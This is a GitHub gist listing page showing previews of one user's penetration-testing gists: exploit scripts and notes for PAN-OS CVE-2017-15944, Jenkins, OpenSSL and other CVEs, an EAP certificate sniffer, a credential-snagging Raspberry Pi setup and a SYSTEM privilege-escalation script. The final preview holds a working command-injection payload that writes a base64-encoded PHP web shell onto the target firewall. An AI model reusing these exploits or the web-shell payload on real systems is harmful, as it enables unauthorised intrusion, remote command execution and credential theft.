Skip to content

Instantly share code, notes, and snippets.

View milo2012's full-sized avatar

Keith Lee milo2012

618 followers · 9 following
View GitHub Profile
@milo2012
milo2012 / CVE-2017-15944.md
Last active June 22, 2023 08:07
CVE-2017-15944.md

Description

I encountered a situation where the target running PAN-OS was vulnerable to CVE-2017-15944 but I was unable to exploit it using Metasploit.

The issue with exploiting CVE-2017-15944

One of the techniques of exploiting CVE-2017-15944 exploit, is to create a file under /opt/pancfg/mgmt/logdb/traffic/1/* which gets processed by the cron job (/etc/cron.d/indexgen -> /usr/local/bin/genindex_batch.sh). Metasploit uses this technique.

The article at https://tinyhack.com/2019/01/10/alternative-way-to-exploit-cve-2017-15944-on-pan-os-6-1-0/ mentions that it might be impossible to exploit CVE-2017-15944 as the script is already running. The article mentions that the cron job (/etc/cron.d/core_compress -> /usr/local/bin/core_compress) is also vulnerable to command injection.

@milo2012
milo2012 / sendKeys.go
Created January 27, 2023 19:54
sendKeys.go
package main
import (
//"flag"
"log"
"fmt"
"strings"
"time"
"github.com/stephen-fox/user32util"
)
var timeout time.Duration = 1
@milo2012
milo2012 / sniffCert.py
Created September 27, 2018 04:17
Sniff and extract server SSL certificate of wireless access point (EAP)
#!/usr/bin/python
'''
$ python sniffCert.py -h
Usage: sniffCert.py [options]
Options:
-h, --help show this help message and exit
-i INTERFACENO Interface to sniff
$ python sniffCert.py -i en0
@milo2012
milo2012 / CVE-2010-4180.py
Last active May 25, 2022 12:03
CVE-2010-4180.py
'''
#https://www.tenable.com/plugins/nessus/51892
% python3 CVE-2010-4180.py -t x.x.x.x
[*] Connecting using Cipher: ECDHE-RSA-AES256-GCM-SHA384
SSL-Session:
Protocol : TLSv1.2
Cipher : ECDHE-RSA-AES256-GCM-SHA384
Session-ID: 9B36462FA6870CB80E916C0C1B0760D7946EA6464462B8ADF269D38BF1EAC522
Session-ID-ctx:
@milo2012
milo2012 / CVE-2020-25780.py
Created February 8, 2022 06:11
CVE-2020-25780.py
import optparse
import requests
import xml.etree.ElementTree as ET
import xmltodict
import base64
def fixed_xml_body_as_string(filename):
text='<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">'
text+=' <soapenv:Header/>'
text+=' <soapenv:Body>'
@milo2012
milo2012 / pentesting_ios_apps_on_electra.txt
Last active January 19, 2022 14:04
Pentesting IOS Applications on Electra 11.1.2
#Burp SSL Certificate on IOS 11
On iOS 11 you can't just install your MITM root cert, you also need to explicitly trust it.
You can do this by:
Settings -> General -> About -> Certificate Trust Settings -> Flip the switch on your cert
----------------------------------------------------------------------------------------------------------------
#GDB on IOS 11
Source: https://shmoo419.github.io/
gdb
ps -ax | grep -i appName
attach [processNo]
@milo2012
milo2012 / exploit_notes_Exploit Notes: CVE-2019-1003000, CVE-2019-1003001, CVE-2019-1003002.txt
Last active December 7, 2021 10:17
Exploit Notes: CVE-2019-1003000, CVE-2019-1003001, CVE-2019-1003002
Exploit Notes: CVE-2019-1003000, CVE-2019-1003001, CVE-2019-1003002
#Install vulnerable docker version of Jenkins
$ docker run -p 8080:8080 -p 50000:50000 jenkins/jenkins:2.121.2
- Go to http://127.0.0.1:8080
- Install suggested plugins
- Create a user account (admin|admin)
- Click "New Item"
- Under Item Name, enter 'Helloworld', choose 'Pipeline' and click 'OK'
- Under 'Pipeline', untick 'Use Groovy Sandbox' and click 'Save'
@milo2012
milo2012 / gist:1c638b19b61c1338e21bad23705ff8fb
Last active December 1, 2021 11:58
Snagging creds from locked machines (for Raspberry Pi Zero)
##An update to Snagging Creds From Locked Machines from https://room362.com/post/2016/snagging-creds-from-locked-machines/.
##Installation on Rasberry Pi Zero
##Download Raspbian Jessie Lite from https://www.raspberrypi.org/downloads/raspbian/
##Use Pi Filler and write image to MicroSD
##Follow Step 1) in https://learn.adafruit.com/turning-your-raspberry-pi-zero-into-a-usb-gadget/ethernet-gadget to let the Raspberry Pi Zero device emulates as a USB NIC
$ cd /pentest
$ apt-get install -y python git python-pip python-dev screen sqlite3
$ pip install pycrypto
$ git clone https://github.com/lgandx/Responder
@milo2012
milo2012 / Get-System.ps1
Last active November 22, 2021 18:50
Get-System.ps1
function Get-System {
<#
.SYNOPSIS
GetSystem functionality inspired by Meterpreter's getsystem.
Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: PSReflect
@milo2012
milo2012 / CVE-2017-15944_1.py
Created July 19, 2021 14:29
CVE-2017-15944_1.py
#!/usr/bin/env python
# encoding: utf-8
import requests
import sys
import base64
requests.packages.urllib3.disable_warnings()
session = requests.Session()
def step3_exp():
exp_post = "{\"action\":\"PanDirect\",\"method\":\"execute\",\"data\":[\"07c5807d0d927dcd0980f86024e5208b\",\"Administrator.get\",{\"changeMyPassword\":true,\"template\":\"asd\",\"id\":\"admin']\\\" async-mode='yes' refresh='yes' cookie='../../../../../../var/cores/$(echo PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOz8+Cg==|base64 -d >${PATH:0:1}var${PATH:0:1}appweb${PATH:0:1}htdocs${PATH:0:1}api${PATH:0:1}cmd.php).core -print -exec python -c exec(\\\"PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOz8+Cg==\\\".decode(\\\"base64\\\")) ;'/>\\u0000\"}],\"type\":\"rpc\",\"tid\":713}"
return exp_post